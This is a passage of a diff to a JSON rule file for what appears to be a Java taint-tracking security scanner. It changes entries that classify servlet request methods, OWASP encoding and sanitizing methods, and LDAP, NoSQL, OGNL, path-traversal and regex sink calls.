"jakarta.servlet.http.Part.getHeader(java.lang.String)" + "untags": [ + "html-encoded" + ], + "value": "org.owasp.esapi.Encoder.decodeForHTML(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "http-token-limited-chars" + "base64-decoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getHeaderNames()" + "untags": [ + "base64-encoded" + ], + "value": "org.owasp.esapi.Encoder.decodeFromBase64(java.lang.String)" }, { "command": "", @@ -7304,68 +7319,83 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "url-decoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getHeaders(java.lang.String)" + "untags": [ + "url-encoded", + "xss-encoded" + ], + "value": "org.owasp.esapi.Encoder.decodeFromURL(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "base64-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getInputStream()" + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForBase64(byte[],boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "ldap-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getName()" + "untags": [ + "ldap-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForDN(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "html-encoded" + ], "target": "R", "track": "false", - "untags": [], - "value": "jakarta.servlet.http.Part.getSubmittedFileName()" + "untags": [ + "html-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForHTML(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "html-encoded" + ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getCookies()" + "untags": [ + "html-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForHTMLAttribute(java.lang.String)" }, { "command": "", @@ -7375,27 +7405,31 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "ldap-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeader(java.lang.String)" + "untags": [ + "ldap-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForLDAP(java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P2", "stack_blacklist": [], "tags": [ - "http-token-limited-chars" + "sql-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeaderNames()" + "untags": [ + "sql-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForSQL(org.owasp.esapi.codecs.Codec,java.lang.String)" }, { "command": "", @@ -7405,12 +7439,14 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "url-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" + "untags": [ + "url-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForURL(java.lang.String)" }, { "command": "", @@ -7420,1930 +7456,385 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getPart(java.lang.String)" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForXML(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "xml-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getParts()" + "untags": [ + "xml-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForXMLAttribute(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site", - "xss-encoded" + "xpath-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getQueryString()" + "untags": [ + "xpath-decoded" + ], + "value": "org.owasp.esapi.Encoder.encodeForXPath(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [ - "http-token-limited-chars", - "xss-encoded" + "base64-decoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getRequestedSessionId()" + "untags": [ + "base64-encoded" + ], + "value": "org.owasp.esapi.codecs.Base64.decode(byte[],int,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], - "tags": [], + "tags": [ + "base64-decoded" + ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getContentType()" + "untags": [ + "base64-encoded" + ], + "value": "org.owasp.esapi.codecs.Base64.decode(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "base64-decoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getHeader(java.lang.String)" + "untags": [ + "base64-encoded" + ], + "value": "org.owasp.esapi.codecs.Base64.decode(java.lang.String,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [ - "http-token-limited-chars" + "base64-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getHeaderNames()" + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site" + "base64-encoded" ], "target": "R", "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getHeaders(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "O", - "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getInputStream()" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "O", - "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getName()" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "O", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "javax.servlet.http.Part.getSubmittedFileName()" - } - ], - "enable": 1, - "type": 2, - "value": "javax.servlet.http.HttpServletRequest" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "java.sql.Connection.nativeSQL(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "jdbc" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],jakarta.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,javax.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,javax.naming.directory.SearchControls)" - } - ], - "enable": 1, - "type": 4, - "value": "ldap-injection" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "com.mongodb.DB.doEval(java.lang.String,java.lang.Object[])" - } - ], - "enable": 1, - "type": 4, - "value": "nosql-injection" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "com.opensymphony.xwork2.util.ValueStack.findString(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "com.opensymphony.xwork2.util.ValueStack.findValue(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "com.opensymphony.xwork2.util.ValueStack.findValue(java.lang.String,java.lang.Class)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "", - "untags": [], - "value": "ognl.Ognl.parseExpression(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "ognl.OgnlParser.(java.io.InputStream)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "ognl.OgnlParser.(java.io.Reader)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", - "untags": [], - "value": "ognl.OgnlParser.(ognl.OgnlParserTokenManager)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "", - "untags": [], - "value": "ognl.OgnlParser.topLevelExpression()" - } - ], - "enable": 1, - "type": 1, - "value": "ognl" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "com.squareup.okhttp.RequestBody.create(com.squareup.okhttp.MediaType,byte[],int,int)" - } - ], - "enable": 1, - "type": 1, - "value": "okhttp" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "okhttp3.RequestBody$Companion.create(byte[],okhttp3.MediaType,int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "okhttp3.RequestBody$Companion.create(okhttp3.MediaType,byte[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "okhttp3.RequestBody.create(okhttp3.MediaType,byte[],int,int)" - } - ], - "enable": 1, - "type": 1, - "value": "okhttp3" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "O", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "org.apache.commons.fileupload.FileItem.getString()" - } - ], - "enable": 1, - "type": 1, - "value": "org.apache.commons.fileupload.FileItem" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", - "untags": [], - "value": "org.apache.commons.fileupload.FileUploadBase.parseRequest(org.apache.commons.fileupload.RequestContext)" - } - ], - "enable": 1, - "type": 2, - "value": "org.apache.commons.fileupload.FileUploadBase" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "org.springframework.http.server.ServletServerHttpRequest.getBodyFromServletRequestParameters(jakarta.servlet.http.HttpServletRequest)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "org.springframework.http.server.ServletServerHttpRequest.getBodyFromServletRequestParameters(javax.servlet.http.HttpServletRequest)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", - "untags": [], - "value": "org.springframework.web.bind.annotation.support.HandlerMethodInvoker.resolvePathVariable(java.lang.String,org.springframework.core.MethodParameter,org.springframework.web.context.request.NativeWebRequest,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", - "untags": [], - "value": "org.springframework.web.servlet.mvc.method.annotation.PathVariableMethodArgumentResolver.resolveName(java.lang.String,org.springframework.core.MethodParameter,org.springframework.web.context.request.NativeWebRequest)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [], - "tags": [], - "target": "R", - "track": "false", - "untags": [], - "value": "org.springframework.web.util.pattern.PathPattern.getPatternString()" - } - ], - "enable": 1, - "type": 2, - "value": "org.springframework.web.method.support.HandlerMethodArgumentResolver" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.apache.taglibs.standard.util.EscapeXML.escape(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.encoder.Encode.forHtml(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.encoder.Encode.forHtmlAttribute(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.encoder.Encode.forHtmlContent(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.encoder.Encode.forHtmlUnquotedAttribute(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "url-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "url-decoded" - ], - "value": "org.owasp.encoder.Encode.forUri(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "url-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "url-decoded" - ], - "value": "org.owasp.encoder.Encode.forUriComponent(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.encoder.Encode.forXml(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.encoder.Encode.forXmlAttribute(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.encoder.Encode.forXmlComment(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.encoder.Encode.forXmlContent(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-encoded" - ], - "value": "org.owasp.esapi.Encoder.decodeForHTML(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-encoded" - ], - "value": "org.owasp.esapi.Encoder.decodeFromBase64(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "url-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "url-encoded", - "xss-encoded" - ], - "value": "org.owasp.esapi.Encoder.decodeFromURL(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForBase64(byte[],boolean)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "ldap-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "ldap-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForDN(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForHTML(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForHTMLAttribute(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "ldap-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "ldap-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForLDAP(java.lang.String,boolean)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P2", - "stack_blacklist": [], - "tags": [ - "sql-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "sql-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForSQL(org.owasp.esapi.codecs.Codec,java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "url-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "url-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForURL(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForXML(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForXMLAttribute(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "xpath-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "xpath-decoded" - ], - "value": "org.owasp.esapi.Encoder.encodeForXPath(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-encoded" - ], - "value": "org.owasp.esapi.codecs.Base64.decode(byte[],int,int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-encoded" - ], - "value": "org.owasp.esapi.codecs.Base64.decode(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-decoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-encoded" - ], - "value": "org.owasp.esapi.codecs.Base64.decode(java.lang.String,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.html.PolicyFactory.sanitize(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.CleanResults.getCleanHTML()" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.CleanResults.getCleanXMLDocumentFragment()" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.scan.AbstractAntiSamyScanner.scan(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "owasp-esapi" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.File.(java.io.File,java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [ - "org.owasp.esapi.reference.DefaultValidator.isValidDirectoryPath", - "org.owasp.esapi.reference.DefaultValidator.isValidFileName" - ], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.File.(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.File.(java.lang.String,java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.File.(java.net.URI)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.File.createTempFile(java.lang.String,java.lang.String,java.io.File)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.FileInputStream.(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.nio.file.FileSystem.getPath(java.lang.String,java.lang.String[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.nio.file.spi.FileSystemProvider.getFileSystem(java.net.URI)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.nio.file.spi.FileSystemProvider.newFileSystem(java.net.URI,java.util.Map)" - } - ], - "enable": 1, - "type": 4, - "value": "path-traversal" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [ - "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", - "org.springframework.web.util.UriComponentsBuilder.fromUriString", - "java.lang.String.replaceAll" - ], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.util.regex.Pattern.matcher(java.lang.CharSequence)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [ - "java.lang.String.replaceAll" - ], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jregex.Pattern.matcher(java.lang.String)" - } - ], - "enable": 1, - "type": 4, - 